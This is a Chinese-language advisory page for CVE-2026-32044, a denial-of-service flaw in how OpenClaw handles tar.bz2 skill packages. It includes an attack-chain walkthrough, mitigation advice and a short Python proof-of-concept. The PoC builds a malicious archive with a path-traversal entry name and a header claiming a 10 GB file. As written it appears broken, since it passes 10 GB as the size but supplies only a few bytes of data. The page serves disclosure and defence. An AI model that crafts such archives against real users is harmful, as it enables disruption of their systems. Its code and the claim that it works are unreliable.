CVE-2026-32044 CVSS 5.5 中危

CVE-2026-32044 OpenClaw归档解压拒绝服务漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32044

漏洞类型

归档解压漏洞

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.2之前的版本在tar.bz2技能安装路径中存在归档解压漏洞。该漏洞允许攻击者绕过针对其他格式实施的安全检查，包括特殊条目阻止和提取大小限制。通过诱导用户安装恶意tar.bz2归档，攻击者可触发本地拒绝服务。

技术细节

该漏洞源于OpenClaw在处理tar.bz2格式的技能包时，未正确实施与归档解压相关的安全验证机制。虽然系统对其他归档格式实施了严格的特殊条目（如符号链接、绝对路径）阻止和文件大小限制，但在tar.bz2处理路径中存在逻辑缺陷。攻击者无需认证，只需诱导用户安装特制的恶意tar.bz2文件，即可绕过这些安全护栏。恶意归档文件可包含过大的文件或利用路径遍历技术，在解压过程中耗尽系统磁盘空间或资源，从而导致应用程序崩溃或系统无响应，造成本地拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行了存在漏洞的OpenClaw版本（< 2026.3.2）。

STEP 2

武器化

攻击者构建一个恶意的tar.bz2文件，该文件包含虚假的巨大文件大小声明或路径遍历字符，旨在绕过OpenClaw的安全检查。

STEP 3

交付

攻击者通过网络将恶意tar.bz2技能包分发给目标用户，或上传到用户可访问的仓库。

STEP 4

利用

目标用户在OpenClaw中尝试安装该技能包。系统在解压tar.bz2时，由于未校验文件大小和路径，开始尝试写入大量数据。

STEP 5

影响

系统磁盘空间被耗尽或资源被占满，导致OpenClaw服务崩溃或系统无响应，实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import tarfile
import io

# Create a malicious tar.bz2 payload to simulate the bypass of size guardrails
malicious_tar = io.BytesIO()

with tarfile.open(fileobj=malicious_tar, mode="w:bz2") as tar:
    # Create a TarInfo object representing a very large file
    info = tarfile.TarInfo(name="../../../../tmp/malicious_skill.dat")
    # Set a massive size (e.g., 10GB) to potentially trigger DoS upon extraction
    info.size = 1024 * 1024 * 1024 * 10
    
    # Add a small amount of actual data; the archive claims it is huge due to header
    # This exploits the lack of size checks before/during extraction
    tar.addfile(info, io.BytesIO(b"Malicious payload"))

# Save the malicious file
with open("exploit_skill.tar.bz2", "wb") as f:
    f.write(malicious_tar.getvalue())

print("Malicious tar.bz2 archive created successfully.")

影响范围

OpenClaw < 2026.3.2

防御指南

临时缓解措施

建议用户不要安装来源不明的OpenClaw技能包，特别是tar.bz2格式。管理员应在系统层面监控磁盘使用情况，并在解压操作前实施严格的文件大小和路径白名单验证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表